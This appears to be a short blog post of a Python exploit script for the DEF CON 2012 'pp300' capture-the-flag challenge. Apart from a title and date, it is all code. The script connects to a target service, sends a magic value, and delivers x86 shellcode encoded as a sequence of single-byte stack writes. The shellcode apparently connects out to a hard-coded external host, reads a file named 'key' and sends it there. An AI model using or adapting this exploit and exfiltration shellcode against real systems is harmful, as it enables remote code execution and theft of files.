defcon20 pp300 exploit
2012. 6. 16. 14:10
#!/usr/bin/python2.6 #defcon 2012, pp300 exploit - badcob import socket, sys from struct import pack def make_connection(host,port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) return s def make_payload(scode): #padding 1 byte : shellcode length 79byte scode += "\x90" #move byte ptr ss:[ebp+x], shellcode 1 byte mov_byte_ptr = "\xc6\x45" tmp = '' count = 0 for x in scode: tmp += mov_byte_ptr + chr(count) + x count += 0x1 #call ebp call_ebp = "\xff\xd5\x90\xff" return tmp + call_ebp #shellcode scode = "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F" scode += "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F" scode += "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80" host = "192.168.74.134" port = 7548 num = "3c56bc31268ac65f" + "\x0a" #make payload payload = make_payload(scode) s = make_connection(host,port) s.send(num) s.send(payload)